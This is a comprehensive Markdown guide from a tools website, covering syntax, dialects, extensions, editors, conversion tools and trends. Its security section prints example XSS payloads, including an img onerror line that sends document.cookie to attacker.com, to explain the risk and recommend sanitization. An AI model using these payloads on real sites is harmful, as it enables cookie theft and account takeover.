Saw Tools

Markdown: the complete guide from syntax to professional tools

History, basic and advanced syntax, CommonMark/GFM dialects, MDX, Mermaid, Obsidian, Pandoc, security, and 2026 trends. With practical examples throughout.

1. The history of Markdown: from email to universal standard

Markdown was born in 2004 from a collaboration between John Gruber (author of the Daring Fireball blog) and Aaron Swartz, developer, free software activist, and co-founder of Reddit. The original intent was elegant in its simplicity: to allow anyone to write HTML readable prose the way you would write a plain-text email. Gruber's guiding idea was that Markdown syntax should be intuitive even before rendering — a raw Markdown text should "look" formatted to the naked eye.

The founding philosophy is spelled out in Gruber's original documentation: "The overriding design goal for Markdown's formatting syntax is to make it as readable as possible. The idea is that a Markdown-formatted document should be publishable as-is, as plain text, without looking like it's been marked up with tags or formatting instructions." This native readability is what distinguishes Markdown from languages like reStructuredText or AsciiDoc — and explains its meteoric adoption.

For its first five years, Markdown remained a niche tool, used mainly by developers and technical bloggers. The explosion happened around 2008–2010, driven by two major platforms:

  • GitHub (launched 2008) adopted Markdown as the native format for READMEs, issues, pull requests, and wikis. Overnight, millions of developers learned Markdown because it was the format of their daily tool.
  • Stack Overflow (launched 2008) used Markdown for questions and answers. The global tech community learned to write it naturally.

The 2010s saw Markdown colonize every corner of the tech ecosystem: Jekyll (2008) and Hugo for static blogs, Slate and Swagger for API documentation, Reddit for comments, Slack and Discord for chat, Jupyter Notebooks for data science, and dozens of other tools. In 2014, faced with the proliferation of incompatible dialects, John MacFarlane (author of Pandoc) and a group of contributors published the CommonMark specification — a formal attempt to standardize what Gruber had deliberately left under-specified.

By 2026, Markdown is de facto the universal technical writing format. Large language models (LLMs) produce it by default. The most popular SaaS editors (Notion, Linear, Coda) integrate it natively. The idea of writing documentation in raw HTML by hand has become as anachronistic as writing emails in XML.

2. Basic syntax: the fundamental building blocks

Core Markdown syntax is small enough to fit on one page. Here are the essential elements with, for each, the Markdown code and its corresponding HTML output.

Headings

Headings are created with the # character, from H1 to H6. The original Markdown standard and CommonMark both require a space between # and the text.

Markdown HTML output
# Main heading <h1>Main heading</h1>
## Subheading <h2>Subheading</h2>
### Section <h3>Section</h3>

Bold, italic, strikethrough

Markdown Renders as
**bold text** bold text
*italic text* italic text
***bold and italic*** bold and italic
~~strikethrough~~ strikethrough (GFM)

Lists

Unordered lists use -, *, or +. Ordered lists use numbers followed by a period. Indentation (2 or 4 spaces) creates nested lists.

Markdown Generated HTML
- Item A
- Item B
  - Sub-item
<ul>
  <li>Item A</li>
  <li>Item B
    <ul><li>Sub-item</li></ul>
  </li>
</ul>
1. First
2. Second
3. Third
<ol>
  <li>First</li>
  <li>Second</li>
  <li>Third</li>
</ol>

Links and images

# Link
[link text](https://example.com "optional title")

# Image
![alt text](https://example.com/image.png "optional caption")

# Reference-style link (useful for reuse)
See [the documentation][doc-ref].

[doc-ref]: https://example.com/doc

Inline code and code blocks

Inline code uses single backticks. Code blocks use three backticks (or 4-space indentation in original Markdown). GFM adds syntax highlighting via a language identifier after the opening backticks.

# Inline code
Use the `git status` command to see the current state.

# Code block with syntax highlighting (GFM)
```python
def greet(name):
    return f"Hello, {name}!"
```

Blockquotes and horizontal rules

# Blockquote
> This is a blockquote.
> It can span multiple lines.
>
> And contain multiple paragraphs.

# Horizontal rule
---
or
***

3. Advanced syntax

Tables (GFM)

Tables are not part of original Markdown — they are defined by the GFM specification. The syntax uses pipes | and a separator line with dashes. Colons in the separator line control alignment.

| Column 1      | Column 2      | Column 3     |
|:------------- |:-------------:| ------------:|
| left-aligned  | centered      | right-aligned |
| value         | value         | value        |

Rendering: column 1 is left-aligned (:---), column 2 is centered (:---:), column 3 is right-aligned (---:).

Footnotes

Supported by MultiMarkdown, Pandoc, and many parsers, but not in base CommonMark or strict GFM.

Here is an important claim.[^1]

[^1]: The source of this claim is a 2023 research paper.

Task lists (GFM)

- [x] Completed task
- [ ] Task in progress
- [ ] Task to do

Definition lists

Supported by Pandoc and PHP Markdown Extra, not supported by CommonMark/GFM:

Term
:   Definition of the term on one line.
:   Alternative definition.

Inline HTML

CommonMark allows raw HTML inside Markdown files. Leave a blank line before and after an HTML block. Do not nest Markdown inside HTML tags — most parsers will not process it.

Normal Markdown paragraph.

<div class="alert">
  This content is pure HTML — no Markdown here.
</div>

Another Markdown paragraph.

Escaping special characters

To display a Markdown character literally, prefix it with a backslash \. Escapable characters include: \ ` * _ { } [ ] ( ) # + - . !.

\*This text is not italic\*
\[This is not a link\]

4. The dialect problem: CommonMark vs GFM vs MultiMarkdown

One of the most frequent sources of confusion with Markdown is the proliferation of "dialects" — mutually incompatible variants. Understanding why this happened is essential to using Markdown without unpleasant surprises.

Why original Markdown was problematic

John Gruber published Markdown with prose documentation and a reference implementation in Perl — but without a formal specification. Dozens of edge cases were left undefined: what happens with nested lists whose indentation is inconsistent? With malformed HTML? With nested links? Each implementation made its own decision.

The result: a Markdown document that rendered correctly in one tool could produce a completely different output in another. This incompatibility became a serious problem as Markdown was adopted at scale.

CommonMark: the standardization attempt (2014)

In 2014, John MacFarlane (author of Pandoc), Jeff Atwood (co-founder of Stack Overflow), and others published the CommonMark specification — a formal spec with an exhaustive test suite. The goal: any conformant CommonMark parser produces the same HTML from the same input.

CommonMark is available at spec.commonmark.org. Version 0.31 (2023) covers 652 tests. Major CommonMark-conformant parsers include: cmark (the C reference implementation), marked.js, markdown-it, and many others. CommonMark does not define tables, footnotes, or task lists — those are extensions.

GitHub Flavored Markdown (GFM)

Published in 2017, the GFM specification is a superset of CommonMark. It adds four extensions: tables, strikethrough text (~~), task lists (- [x]), and autolinks (bare URLs become clickable links). The GFM spec is available at github.github.com/gfm.

GFM is today the most widely used Markdown dialect, used by GitHub, GitLab, Gitea, Jira, and dozens of other development tools. When someone says "Markdown" without specifying, they usually mean GFM.

Pandoc Markdown

Pandoc uses its own superset of CommonMark (or original Markdown, configurable) with dozens of optional extensions: footnotes, definition lists, fenced code blocks, multi-line tables, attributes on headings, and more. It is the most expressive version of Markdown, ideal for long-form writing and academic publishing.

MultiMarkdown

Created by Fletcher T. Penney, MultiMarkdown adds footnotes, tables, citations, metadata variables in the header, and math formula support. Popular in the macOS world (iA Writer, Ulysses support MultiMarkdown).

How to find out which dialect your tool uses

The practical rule: check your tool's documentation. Most now specify whether they follow CommonMark, GFM, or something else. When in doubt, test with a table and a task list — if both work, you likely have GFM or a superset.

5. Extended Markdown: MDX, LaTeX, Mermaid, Obsidian

MDX: Markdown + JSX

MDX is an extension that allows React components (JSX) to be used inside Markdown files. It is the native format of modern static site generators like Next.js, Astro, Gatsby, and Docusaurus v3.

import { Chart } from '../components/Chart'

# My article with React components

Here is an interactive chart:

<Chart data={[1, 2, 3, 4]} />

And here the Markdown text continues normally.

MDX enables truly interactive documentation — component previews, code sandboxes, interactive charts — while preserving Markdown readability for textual content. It is today the de facto standard for design systems and modern technical documentation.

Markdown + LaTeX for mathematical formulas

Most Markdown parsers do not include mathematical rendering natively. The standard approach is to use KaTeX or MathJax alongside, with LaTeX syntax delimited by dollar signs:

# Inline formula
Einstein's equation: $E = mc^2$

# Centered display formula
$$
\int_{-\infty}^{+\infty} e^{-x^2} dx = \sqrt{\pi}
$$

This syntax is natively supported by Jupyter Notebooks, Obsidian, Pandoc, and most academic tools. On GitHub, $...$ and $$...$$ formulas have been rendered natively since 2022.

Mermaid: diagrams in Markdown

Mermaid is a JavaScript library that creates diagrams from a textual syntax embedded in Markdown code blocks with the mermaid identifier. GitHub has rendered it natively since 2022.

```mermaid
flowchart LR
    A[Write in Markdown] --> B{Convert}
    B --> C[HTML]
    B --> D[PDF]
    B --> E[DOCX]
```

Mermaid supports flowcharts, sequence diagrams, UML class diagrams, Gantt charts, decision trees, and more. It is a remarkable tool for technical documentation because diagrams are plain-text files that are versionable in git.

Obsidian notation: wikilinks and callouts

Obsidian uses extended Markdown syntax with several proprietary additions that have become popular in other tools (Logseq, Foam):

# Wikilinks — internal links to other notes
See my note on [[Markdown Syntax]] or section [[Guide#Installation]].

# Callouts (styled alert blocks)
> [!info] Information
> This callout displays information in blue.

> [!warning] Warning
> This callout displays a warning in orange.

> [!tip] Tip
> Callouts support Markdown inside them.

Obsidian callouts are not a standard — they are ignored or displayed as ordinary blockquotes in other parsers. If you're writing for a specific platform (GitHub, an SSG), verify compatibility before using them extensively.

6. The ecosystem: editors and platforms

The Markdown editor landscape in 2026 is rich and diverse. Each tool has a different positioning — here are the main ones.

Typora — the WYSIWYG editor that changed habits

Typora was one of the first Markdown editors to offer a truly WYSIWYG mode: you write Markdown and the rendering instantly replaces the syntax, with no separate "preview" mode. The Markdown syntax remains editable (clicking an element reveals the underlying syntax). Available on macOS, Windows, and Linux, paid ($15 one-time). Supports tables, LaTeX, Mermaid, and CSS themes. Ideal for those who want Markdown's power without seeing the syntax day-to-day.

Obsidian — the Markdown-first PKM

Obsidian has become in a few years the most influential note-taking tool in the tech ecosystem. Its central principle: all your notes are .md files on your disk, never locked in a proprietary database. The "knowledge graph" feature visualizes links between your notes. An ecosystem of plugins (850+ community plugins) massively extends functionality: git sync, visual canvas, Dataview (queries on notes), Templater, embedded Excalidraw. The base version is free; Obsidian Sync (encrypted synchronization on their servers) is paid.

Notion — the proprietary variant that won the mainstream

Notion uses a Markdown-inspired but proprietary syntax: you can type # to create a heading or - for a list, but files are not stored as .md. Markdown export is unreliable (advanced blocks like databases do not export cleanly). Notion excels for team collaboration, visual databases, and project organization — but if data portability is a priority, choose a Markdown-first tool.

VS Code — the universal editor with built-in preview

VS Code integrates a native Markdown preview (Ctrl+Shift+V or the "Open Preview" button). The Markdown All in One extension adds automatic table of contents, formatting shortcuts, and list numbering. It is the tool of choice for developers writing documentation alongside code, especially thanks to git integration and the built-in terminal.

iA Writer — the long-form writing tool

iA Writer is designed for distraction-free writing — a stripped-down interface centered on text. It supports MultiMarkdown and has a unique feature, "Focus Mode," which dims everything except the sentence currently being written. Popular among journalists and technical writers. Available on macOS, iOS, Windows, and Android.

Logseq — the open-source Obsidian alternative

Logseq is an outliner (hierarchical list editor) that uses Markdown as its storage format. Key difference from Obsidian: each note is structured as a block outline, not a linear document. Logseq is fully open source (AGPL) and particularly well-suited for project management and structured note-taking. Files are portable .md files.

Joplin — the open-source encrypted note manager

Joplin stores notes in Markdown, supports end-to-end encryption, and syncs via Dropbox, Nextcloud, or its own server. It is the privacy-first alternative to Evernote or Notion for personal use.

7. Converting Markdown to HTML, PDF, and DOCX

A .md file is plain text. To publish it, print it, or share it with someone who doesn't use Markdown, you need to convert it. The options are plentiful.

Pandoc: the Swiss army knife of conversion

Pandoc is the reference tool for all document conversion. It reads Markdown (multiple configurable dialects), HTML, reStructuredText, LaTeX, DOCX, EPUB, and dozens of other formats, and can convert them to just as many targets.

# Markdown to HTML
pandoc article.md -o article.html

# Markdown to PDF (via LaTeX — requires TeX installed)
pandoc article.md -o article.pdf

# Markdown to DOCX (Word)
pandoc article.md -o article.docx

# Markdown to EPUB
pandoc article.md --metadata title="My Book" -o book.epub

# With custom template and table of contents
pandoc article.md --toc --template=my-template.html -o article.html

Pandoc is indispensable for academic publishing and technical documentation. It supports footnotes, bibliographic citations (via BibTeX or CSL), LaTeX formulas, and Mermaid diagrams (with filters).

markdown-it (JavaScript/Node.js)

markdown-it is the reference JavaScript Markdown parser, used by VS Code, GitLab, and hundreds of other tools. It is fast, modular (extensions via plugins), and configurable. CommonMark-conformant. Usable server-side (Node.js) and client-side (browser).

const md = require('markdown-it')({
  html: false,        // disable inline HTML (security)
  linkify: true,      // autolinks
  typographer: true   // typographic quotes
})
const result = md.render('# Hello\n\nThis is **Markdown**.')

marked.js (JavaScript — simple and fast)

marked is one of the most popular JavaScript Markdown parsers (millions of npm downloads per week). Simple to integrate, supports GFM by default. Less modular than markdown-it but sufficient for 95% of web use cases.

import { marked } from 'marked'
const html = marked('# Title\n\nText with **bold**.')

python-markdown (Python)

The standard Python library for Markdown rendering. Supports many extensions (tables, fenced_code, footnotes, toc, etc.) individually activatable. Used by MkDocs for documentation.

import markdown
html = markdown.markdown(
    text,
    extensions=['tables', 'fenced_code', 'footnotes', 'toc']
)

Why rendering varies between parsers

The question comes up regularly: "My Markdown looks fine in Obsidian but not on GitHub." The cause is almost always a different dialect. Some practical rules to minimize surprises:

  • Avoid non-GFM extensions (definition lists, advanced footnotes) if your content targets GitHub.
  • Always test in the destination tool, not just in your local editor.
  • Use our online Markdown converter to verify the HTML rendering of your syntax in real time.
  • For serious projects, explicitly set the dialect in your tool's configuration (e.g., gfm: true in marked's config).

8. Markdown in the professional workflow

READMEs and GitHub documentation

The README.md file at the root of a GitHub repository is the project's front page — it is automatically rendered with GFM. Current conventions include: badges (build status, coverage, license), screenshots, copyable installation instructions, and feature tables. A well-crafted README in GFM can significantly improve an open-source project's adoption.

Technical documentation with SSGs

Markdown-based documentation site generators have become the industry standard:

  • Docusaurus (Meta, React) — MDX, versioning, i18n, Algolia search. Standard in the JS ecosystem.
  • MkDocs + Material Theme (Python) — simple, elegant, highly customizable. Standard in Python and DevOps ecosystems.
  • VitePress (Vue.js) — ultra-fast, Vue 3, MDX. Used by Vue, Vite, and dozens of major JS projects.
  • Starlight (Astro) — the newcomer, optimal static builds, native MDX, highly rated.

Static blogs

Hugo (Go) and Jekyll (Ruby) were the pioneers of the Markdown static blog. By 2026, Astro and Next.js with the Content Collections API dominate new projects thanks to MDX support and the React ecosystem. The typical workflow: write in local Markdown, git commit, automatic deployment via Netlify or Vercel.

Changelogs and release notes

The Keep a Changelog format (keepachangelog.com) standardizes CHANGELOG.md files with "Added / Changed / Deprecated / Removed / Fixed / Security" sections per version. The Conventional Commits convention allows these changelogs to be generated automatically from commit messages.

Meeting notes and internal documentation

Markdown has established itself as the preferred format for meeting notes in tech teams. The advantages: versionable in git, readable without any specific tool, convertible to PDF for non-tech stakeholders, and easily integrated into wikis (Confluence supports Markdown, GitLab Wiki is natively Markdown).

9. Markdown security: the often-overlooked XSS risk

Markdown is often perceived as "harmless" because it is text. This is a mistake. When user-supplied Markdown content is rendered in a browser without precautions, it can introduce serious XSS (Cross-Site Scripting) vulnerabilities.

The attack vector

CommonMark allows raw HTML in Markdown. If your application renders third-party users' Markdown content without sanitization, an attacker can inject:

# XSS injection in Markdown
Here is an innocent link: [click here](javascript:alert('XSS'))

Or direct HTML:
<script>document.cookie = 'stolen=' + document.cookie</script>

Or more subtle:
<img src="x" onerror="fetch('https://attacker.com/?c='+document.cookie)">

How to protect yourself

Best practices in 2026 are clear:

  1. Disable inline HTML in your parser if you don't need it. In markdown-it: html: false. In marked: use DOMPurify on the output (the old sanitize: true option is deprecated).
  2. Sanitize the produced HTML with DOMPurify client-side, or with bleach (Python) / sanitize-html (Node.js) server-side. Apply this sanitization after Markdown rendering, on the final HTML.
  3. Watch out for dangerous URL schemes in links (javascript:, vbscript:, data:). DOMPurify strips these by default.
  4. Watch out for image tokens: a remote image in Markdown rendered server-side can reveal the server's IP to an attacker via a GET request. For HTML emails generated from Markdown, it may also confirm the email was opened (pixel tracking).

Note: if your Markdown content is entirely written by you (static documentation, blog, README), the XSS risk is zero — there is no user content. The risk is specific to applications that allow third parties to submit Markdown (comments, collaborative wikis, multi-author CMSs).

Recommended parsers and configurations for public rendering

Parser Secure configuration
markdown-it { html: false } + DOMPurify on output
marked DOMPurify required on HTML output
python-markdown bleach.clean() on output
Pandoc --sandbox flag (Pandoc 2.17+)

10. Trends 2026: convergence, LLMs, and Markdown-first

Convergence toward CommonMark + GFM

The market has progressively aligned on CommonMark + GFM extensions as the de facto standard. Major parsers (markdown-it, marked, Pandoc in GFM mode) are now conformant. Platforms (GitHub, GitLab, Linear, Jira, Notion) all support the GFM subset. The "dialect wars" of the 2010s are fading.

The triumph of Markdown-first tools

Obsidian surpassed 1.5 million users in 2025. Bear, iA Writer, Logseq, and Craft all show sustained growth. The idea of owning one's notes in portable files is regaining ground against proprietary SaaS in the post-pandemic era. The "PKMS" (Personal Knowledge Management Systems) trend has popularized Markdown among non-developer audiences.

Markdown as the universal format for LLMs

This may be the most structurally significant trend of 2025–2026: large language models produce Markdown by default. ChatGPT, Claude, Gemini, Mistral — all format their responses in Markdown. The reasons are multiple:

  • Markdown is massively represented in training corpora (GitHub, Stack Overflow, open-source documentation, Reddit).
  • Its textual syntax encodes semantic structure (hierarchy, emphasis, code) in a way that the model can learn and reproduce.
  • The interfaces that display these models (Claude.ai, ChatGPT, API interfaces) know how to render Markdown natively.
  • Markdown has become the standard export format for LLM conversations — a structured, portable, versionable document.

In 2026, RAG (Retrieval-Augmented Generation) pipelines use Markdown as the pivot format: documents are chunked on Markdown heading boundaries, generated responses are in Markdown, and prompt engineering systems use Markdown to structure instructions to models.

Markdown in generative AI: concrete use cases

Beyond conversations, Markdown integrates into new AI workflows: automated code documentation generation (GitHub Copilot writes READMEs in Markdown), AI agents that create structured reports, transcription tools that produce meeting summaries in Markdown. The boundary between "human writing format" and "machine-to-machine communication format" is blurring in Markdown's favor.

11. Conclusion: Markdown, the format you were already using without knowing it

If you have ever written a README on GitHub, formatted a message in Slack or Discord, written an answer on Stack Overflow, or received a response from an LLM, you have already consumed Markdown. Its strength is not in a spectacular feature, but in its quiet ubiquity.

The central lesson of this guide: Markdown is not a single format — it is a family of formats sharing a core syntax. Understanding the dialects (CommonMark, GFM, Pandoc) and knowing which parser your tool uses avoids 80% of surprises. The rest — MDX, Mermaid, LaTeX, Obsidian — are extensions that enrich Markdown to suit specific needs without betraying its founding principle: text that is readable before it is ever rendered.

To convert your Markdown files to HTML immediately, use our online Markdown converter — free, no sign-up required, no data stored server-side. You can also explore our Base64 encoder/decoder to understand how textual data is encoded in web pipelines, or our color converter for designers working on their CSS alongside their Markdown documentation.

Frequently asked questions

What is the difference between CommonMark and GitHub Flavored Markdown?

CommonMark is a formal specification published in 2014 to standardize the original Markdown, which left many edge cases ambiguous. GitHub Flavored Markdown (GFM) is a superset of CommonMark: it adds four practical extensions — tables, strikethrough (~~), task lists (- [x]), and autolinks. GFM is the most widely used Markdown dialect in 2026, but its extensions are not universally supported outside Git platforms. If you're targeting GitHub, aim for GFM. For maximum portability, stick to CommonMark only.

My Markdown table is not rendering — why?

Tables are part of GFM, not base CommonMark. If your parser uses a minimalist implementation (original Markdown, plain cmark), tables are silently ignored. Check that your tool supports GFM or enable the corresponding extension (e.g., marked.use({ gfm: true }) in JavaScript). Another frequent cause: a malformed separator line — each cell needs at least 3 dashes, and all pipes | must be present. Test your syntax with our Markdown converter.

Markdown or Notion: which to choose for note-taking in 2026?

Notion is excellent for team collaboration and visual databases, but its files are proprietary — the Markdown export remains unreliable for complex content. Markdown in Obsidian, Logseq, or VS Code gives you portable .md files, readable without any tool, and versionable with git. In 2026, the trend is clear: Markdown-first tools are gaining ground for personal PKM. If data ownership and a 10-year lifespan are criteria, choose Markdown. If real-time collaboration and visual databases matter most in a professional context, Notion remains a solid choice.

How do I embed HTML in Markdown without breaking the render?

CommonMark allows raw HTML inside Markdown files. Two rules to follow: leave a blank line before and after your HTML block to prevent it from being merged with surrounding Markdown, and don't nest Markdown inside HTML tags (most parsers won't render it). Security note: if HTML content from third-party users is rendered without precautions, you expose your site to XSS attacks. Always use html: false in markdown-it or DOMPurify on the produced HTML for any externally sourced content.

Why has Markdown become the preferred format for LLMs?

Large language models (ChatGPT, Claude, Gemini) produce Markdown by default because its textual syntax is massively represented in their training corpora (GitHub, Stack Overflow, open-source docs). Markdown encodes semantic structure — headings, lists, code — without HTML's verbosity or LaTeX's complexity, which models learn to reproduce naturally. In 2026, Markdown has established itself as the lingua franca between humans and AI, both for conversational exchanges and for RAG pipelines and autonomous agent systems.